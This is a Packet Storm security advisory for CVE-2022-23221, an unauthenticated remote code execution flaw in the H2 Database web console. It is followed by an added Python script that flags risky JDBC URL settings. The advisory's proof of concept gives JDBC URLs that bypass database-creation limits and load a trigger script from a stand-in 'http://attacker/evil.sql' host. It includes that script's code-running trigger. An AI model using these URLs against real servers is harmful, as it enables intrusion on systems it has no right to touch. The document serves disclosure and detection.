Source: Packet Storm (PACKETSTORM:165676)
Author: Ismail Aydemir
Date: Jan 25, 2022

H2 Database Console Remote Code Execution

`Document Title  
===============  
Unauthenticated RCE vuln in the H2 Database console: CVE-2022-23221.  
  
Product Description  
===============  
The H2 Console Application  
  
The Console lets you access a SQL database using a browser interface.  
  
Homepage: http://www.h2database.com/html/quickstart.html  
  
Affected Components  
===============  
File Name: WebServer.java  
File Path: /h2database/h2/src/main/org/h2/server/web/WebServer.java  
Impacted Function: getConnection  
  
PoC  
===============  
  
1) Navigate to the console and attempt to connect to an H2 in-memory  
database that does not exist using the following JDBC URL:  
  
```  
jdbc:h2:mem:1337;  
```  
  
2) Note that you get the following security exception preventing you  
from creating a new in-memory database:  
  
```  
Database "mem:1337" not found, either pre-create it or allow remote  
database creation (not recommended in secure environments) [90149-209]  
90149/90149 (Help)  
```  
  
3) Now try again with the following JDBC URL:  
  
```  
jdbc:h2:mem:1339;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;'\  
```  
  
4) Note that you were able to successfully create a new in-memory database.  
  
5) Create a SQL file that contains a trigger that executes  
Java/JavaScript/Ruby code when executed and host it on a domain you  
control (e.g. http://attacker).  
  
6) Use the following JDBC URL to execute the SQL file hosted on your  
domain on connect:  
  
```  
jdbc:h2:mem:1337;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT  
FROM 'http://attacker/evil.sql';'\  
```  
  
Example evil.sql file:  
  
```  
CREATE TABLE test (  
id INT NOT NULL  
);  
  
CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript  
var fos = Java.type("java.io.FileOutputStream");  
var b = new fos ("/tmp/pwnedlolol");';  
  
INSERT INTO TEST VALUES (1);  
```  
  
CVE Issued: CVE-2022-23221  
  
  
`
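
Added example, not part of the original advisory: a Python check that parses H2 JDBC URLs (for instance from console request logs) and flags the settings the PoC above depends on. The function names and finding labels are assumptions made for illustration; the first three sample URLs are the advisory's own and the fourth is constructed.

```python
import re
from urllib.parse import unquote_plus

# Setting names and values come from the JDBC URLs in the advisory's PoC.
RISKY = {"FORBID_CREATION": "FALSE", "IGNORE_UNKNOWN_SETTINGS": "TRUE"}
# INIT value that pulls its script from a network location.
REMOTE_SCRIPT = re.compile(r"RUNSCRIPT\s+FROM\s+'?\s*(?:https?|ftp)://", re.I)

def parse_settings(jdbc_url):
    """Return (database, {SETTING: value}) for an H2 JDBC URL, else (None, {}).

    Settings are ';'-separated KEY=VALUE pairs; '\\;' is an escaped semicolon
    inside a value. Input may be form-encoded, as it would be in a request log.
    """
    body = unquote_plus(jdbc_url).strip()
    if not body.lower().startswith("jdbc:h2:"):
        return None, {}
    parts = re.split(r"(?<!\\);", body[len("jdbc:h2:"):])
    settings = {}
    for part in parts[1:]:
        if "=" in part:
            key, value = part.split("=", 1)
            settings[key.strip().upper()] = value.replace("\\;", ";").strip()
    return parts[0], settings

def findings(jdbc_url):
    """List the reasons (hypothetical labels) a submitted URL deserves an alert."""
    _, settings = parse_settings(jdbc_url)
    hits = [f"{k}={v}" for k, v in RISKY.items()
            if settings.get(k, "").upper() == v]
    init = settings.get("INIT", "")
    if init:
        hits.append("INIT runs SQL on connect")
        if REMOTE_SCRIPT.search(init):
            hits.append("INIT loads a remote script")
    return hits

# URLs 1-3 are the advisory's; the last is constructed to show the '\;' escape.
SAMPLES = [
    "jdbc:h2:mem:1337;",
    "jdbc:h2:mem:1339;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;'\\",
    "jdbc:h2:mem:1337;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;"
    "INIT=RUNSCRIPT FROM 'http://attacker/evil.sql';'\\",
    "jdbc:h2:~/app;INIT=RUNSCRIPT FROM '~/a.sql'\\;RUNSCRIPT FROM '~/b.sql'",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(findings(url) or "clean", "<-", url)
```

Any `INIT` setting is reported because a URL typed into the console is user-supplied input; for application-owned connection strings that rule would need an allowlist.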